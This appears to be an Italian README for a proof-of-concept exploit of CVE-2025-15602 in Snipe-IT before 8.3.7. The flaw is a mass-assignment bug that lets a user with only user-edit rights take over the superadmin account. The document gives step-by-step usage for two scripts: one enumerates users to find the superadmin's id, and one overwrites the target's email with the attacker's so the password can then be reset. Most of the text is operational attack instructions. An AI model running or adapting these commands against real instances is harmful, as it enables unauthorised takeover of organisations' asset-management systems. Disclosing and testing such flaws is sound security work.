
Snipe-IT < 8.3.7 Vulnerabilità di assegnazione di massa che porta all'escalation dei privilegi
CVE-2025-15602-PoC è una prova di concetto per la vulnerabilità CVE-2025-15602 in Snipe-IT. Uno script per elencare tutti gli utenti e uno script per impossessarsi di un account superadmin.
Un utente ha solo il diritto di modificare gli utenti, può abusarne per elencarli e per eseguire un takeover dell'account superadmin.
Non dimenticare di cambiare BASE_URL nello script per farlo corrispondere alla tua istanza di snipe-it.
Elenca tutti gli utenti dell'istanza, per ottenere l'id del superadmin di cui vuoi impossessarti.
python3 list_users.py --attacker-username tuo_utente --attacker-password tua_password --max-id 100
Non dimenticare di cambiare BASE_URL nello script per farlo corrispondere alla tua istanza di snipe-it.
Impossessati di un account superadmin tramite mass assignment
IMPORTANTE: devi prima ottenere le giuste informazioni da list_users.py altrimenti non funzionerà. L'id, il nome utente e il nome proprio devono essere esattamente uguali a quelli dell'account di destinazione.
python3 exploit_auth.py \
--target-id 1 \
--admin-username admin \
--admin-firstname Admin \
--admin-email [email protected] \
--attacker-username tuo_utente \
--attacker-password tua_password
Dopodiché puoi reimpostare la password tramite l'email che hai impostato
pip install requests beautifulsoup4